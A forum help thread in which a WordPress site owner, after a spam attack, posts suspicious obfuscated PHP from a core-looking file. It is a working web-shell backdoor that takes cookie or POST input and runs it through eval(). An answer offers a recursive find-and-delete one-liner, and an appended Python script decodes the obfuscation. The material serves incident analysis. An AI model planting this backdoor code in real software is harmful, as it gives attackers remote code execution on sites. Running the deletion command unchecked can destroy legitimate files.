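I am asking for help/advice about an attack that was recently launched on my website... The attack basically sends a lot of spam through my email account. I also have some suspicious files that I would appreciate a second pair of eyes on. I have successfully removed the main spam script, but I would like to know whether this file, wp-includes/Text/Diff/diff16.php, is native or foreign.
Also, given the sheer volume of spam, how do I purge outgoing mail on Linux? It is bogging down my server and taking up too much space.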
Below is the suspicious code in diff16.php:
<?php $GLOBALS['h8d181c'] = "\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75";
$GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][3];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]] = $GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]] = $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]] = $GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]] = $GLOBALS['h8d181c'][86].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] = $_POST;
$GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] = $_COOKIE;
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70], NULL);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29], 0);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82], 0);
@$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]](0);
$rb00 = NULL;
$c174 = NULL;
$GLOBALS[$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][32];
global $e57c7;
function h114d($rb00, $n06f3)
{
$t89f0c4 = "";
for ($p89c=0; $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00);)
{
for ($b8a92b=0; $b8a92b<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($n06f3) && $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00); $b8a92b++, $p89c++)
{
$t89f0c4 .= $GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($rb00[$p89c]) ^ $GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($n06f3[$b8a92b]));
}
}
return $t89f0c4;
}
function y26e2($rb00, $n06f3)
{
global $e57c7;
return $GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($rb00, $e57c7), $n06f3);
}
foreach ($GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
if (!$rb00)
{
foreach ($GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
}
$rb00 = @$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]]($GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00), $c174));
if (isset($rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]]) && $e57c7==$rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]])
{
if ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][71])
{
$p89c = Array(
$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85] => @$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]](),
$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][85] => $GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][90].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][65],
);
echo @$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]]($p89c);
}
elseif ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][82])
{
eval($rb00[$GLOBALS['h8d181c'][56]]);
}
exit();
}
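Answer 0 (score: 1)
I'm still trying to figure out how to stop these files from appearing on my server, but I can at least delete them. Here is a one-liner that might help: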
find . -type f -name "*.php" -exec fgrep -m 1 -F "\$GLOBALS[\$GLOBALS[" {} \; -delete
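It basically crawls the current directory (and its subdirectories), searches for files containing code like this, and deletes them. (You may want to try it first without the -delete directive, to make sure you don't delete any files that should be kept.)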
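
To judge whether a file like diff16.php is foreign before deleting it, the lookup-table obfuscation can be decoded statically, without ever running the PHP. The Python below is an added example, not part of the original question or answer; the helper names are hypothetical, and `SAMPLE` is constructed from the index sequences of two assignments in the posted file.

```python
import re

# Lookup-table literal copied from the first line of the posted diff16.php.
TABLE_LITERAL = (
    r"\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c"
    r"\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44"
    r"\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61"
    r"\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75"
)
VAR = "h8d181c"  # name of the lookup-table variable in this sample

def decode_table(literal):
    """Expand PHP \\xH / \\xHH escapes; this table contains nothing else."""
    return re.sub(r"\\x([0-9a-fA-F]{1,2})", lambda m: chr(int(m.group(1), 16)), literal)

def deobfuscate(src, table, var=VAR):
    """Replace each chain of $GLOBALS['var'][N] lookups with the string it builds."""
    item = r"\$GLOBALS\['" + re.escape(var) + r"'\]\[(\d+)\]"
    chain = re.compile(item + r"(?:\." + item + r")*")
    def fold(m):
        text = "".join(table[int(n)] for n in re.findall(item, m.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return chain.sub(fold, src)

def alias_map(clean_src):
    """Collect $GLOBALS['alias'] = 'function'; assignments from decoded source."""
    return dict(re.findall(r"\$GLOBALS\['(\w+)'\]\s*=\s*'(\w+)';", clean_src))

def php_chain(*idx):
    """Hypothetical helper: rebuild a lookup chain from a list of table indices."""
    return ".".join("$GLOBALS['%s'][%d]" % (VAR, i) for i in idx)

# Constructed sample: index sequences transcribed from two assignments in the file.
SAMPLE = "\n".join([
    "$GLOBALS[%s] = %s;" % (php_chain(72, 77, 54, 93, 82, 82, 56, 53, 25), php_chain(81, 69, 3)),
    "$GLOBALS[%s] = %s;" % (php_chain(15, 32, 25, 34),
                            php_chain(93, 74, 29, 82, 39, 17, 92, 56, 82, 81, 27, 56, 82)),
])

if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE, decode_table(TABLE_LITERAL))
    print(decoded)
    print(alias_map(decoded))
```

Run over the whole file, the same functions show that the script aliases built-ins such as `chr` and `base64_decode` behind random names before reaching the `eval` call, which a stock WordPress file has no reason to do.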